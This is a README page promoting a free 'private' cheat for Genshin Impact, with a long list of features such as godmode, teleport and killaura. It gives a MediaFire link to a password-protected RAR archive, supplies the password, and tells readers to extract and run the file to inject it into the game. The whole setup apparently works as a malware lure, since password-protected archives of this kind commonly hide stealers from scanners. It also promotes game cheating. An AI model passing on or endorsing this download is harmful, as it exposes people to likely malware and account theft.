<a href="https://git.io/typing-svg"><img src="https://readme-typing-svg.demolab.com?font=&duration=2000&pause=100&width=435&lines=DOWNLOAD+FREE+%7C+PRIVATE+GENSHIN+CHEAT" alt="Typing SVG" /></a>

# Download cheat

|[Download](https://www.mediafire.com/file/87nr7o85po2luoe/Cheat.rar/file)|
|:-------------|
Passwrod: `6666`
-----------------------------------------------------------------------------------------------------------------------
# How to install?

- Download the archive 

- Unzip the archive to your desktop ( Password from the archive is 6666 )

- Run the file ( Inject )

- Launch the game

- In-game F8 button

-----------------------------------------------------------------------------------------------------------------------

# Functional

![b69375_5c6928d5df274c8d8ed4f4c3867c1311_mv2](https://user-images.githubusercontent.com/125276433/218482310-d41ddca1-94f7-4a0c-8413-e439133f180e.gif)

# Player

- Invincible
- NoClip
- Unlimited Stamina
- Fast attack
- Rapid Fire
- Dumb Enemies
- Inf Ultimate
- Attack Modifier
- No Cooldown Skill/Ultimate/Sprint

# World

- Auto Loot
- Auto Talk
- Killaura
- Auto Tree Farm
- Mob Vacuum
- Auto Fish
- Auto Cooking
- Music Event

# Teleport

- Chest/Oculi Teleport
- Map Teleport
- Custom Teleport
- Visuals

# ESP

- Interactive Map
- Elemental Sight
- Profile Changer
- In-game Embedded Browser
- Hide UI
- Camera Zoom
- No Fog

# Other

- Godmode
- AOE loot
- AOE chests
- Mob Magnetizer
- Speedup Dialogues
- Freeze Mobs
- Skip Cutscenes
- FPS unlocker
- Config system
